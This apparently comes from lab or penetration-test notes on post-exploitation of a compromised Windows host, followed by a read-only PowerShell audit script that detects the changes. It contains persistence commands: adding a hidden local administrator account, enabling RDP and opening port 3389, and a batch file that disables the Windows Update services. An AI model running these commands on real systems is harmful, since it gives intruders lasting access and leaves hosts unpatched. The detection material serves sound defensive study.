Beyond


This is the Beyond page, where additional enumeration and assessment are conducted as SYSTEM after the target system was compromised via token impersonation and SMBGhost.

C:\Windows\system32> net user adm1n qwe123 /ADD && net localgroup administrators /ADD adm1n
 
The command completed successfully.
The command completed successfully.
 
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 
The operation completed successfully.
 
C:\Windows\system32>netsh firewall add portopening TCP 3389 "Remote Desktop"
 
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

RDP

Scheduled Tasks


C:\Windows\stop.bat


C:\Windows\system32> type C:\Windows\stop.bat
 
sc stop WaasMedicSvc
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\WaasMedicSvc /v Start /f /t REG_DWORD /d 4
sc stop wuauserv
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Start /f /t REG_DWORD /d 4
sc stop UsoSvc
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v Start /f /t REG_DWORD /d 4
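
From the defender's side, every change shown on this page leaves state that can be audited. The read-only check below is an added example, not part of the original notes. It reads the same registry values and firewall port seen above; the $expectedAdmins baseline is an assumption to be replaced with the site's own list.

```powershell
# Added example: read-only audit of the settings changed on this page.
# Run from an elevated PowerShell prompt on the host under review.
$findings = [System.Collections.Generic.List[string]]::new()

# 1. RDP state: fDenyTSConnections = 0 means Remote Desktop connections are allowed.
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$ts = Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue
if ($ts -and $ts.fDenyTSConnections -eq 0) {
    $findings.Add('RDP is enabled (fDenyTSConnections = 0)')
}

# 2. Windows Update services: Start = 4 means the service is disabled,
#    which is what stop.bat writes for these three services.
foreach ($svc in 'WaasMedicSvc', 'wuauserv', 'UsoSvc') {
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
    $start = (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
    if ($start -eq 4) {
        $findings.Add("Service $svc is disabled (Start = 4)")
    }
}

# 3. Firewall: enabled inbound allow rules that open TCP 3389.
Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction SilentlyContinue |
    ForEach-Object {
        $filter = $_ | Get-NetFirewallPortFilter
        if ($filter.Protocol -eq 'TCP' -and $filter.LocalPort -contains '3389') {
            $findings.Add("Firewall allows inbound TCP 3389: $($_.DisplayName)")
        }
    }

# 4. Local Administrators membership compared with a baseline.
#    Assumption: only the built-in Administrator account is expected here.
$expectedAdmins = @("$env:COMPUTERNAME\Administrator")
Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -notin $expectedAdmins } |
    ForEach-Object { $findings.Add("Unexpected member of Administrators: $($_.Name)") }

# Report
if ($findings.Count -eq 0) {
    'No findings.'
} else {
    $findings
}
```

With account management auditing enabled, the account creation and the group change are also recorded in the Security log as events 4720 and 4732.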

Windows FTP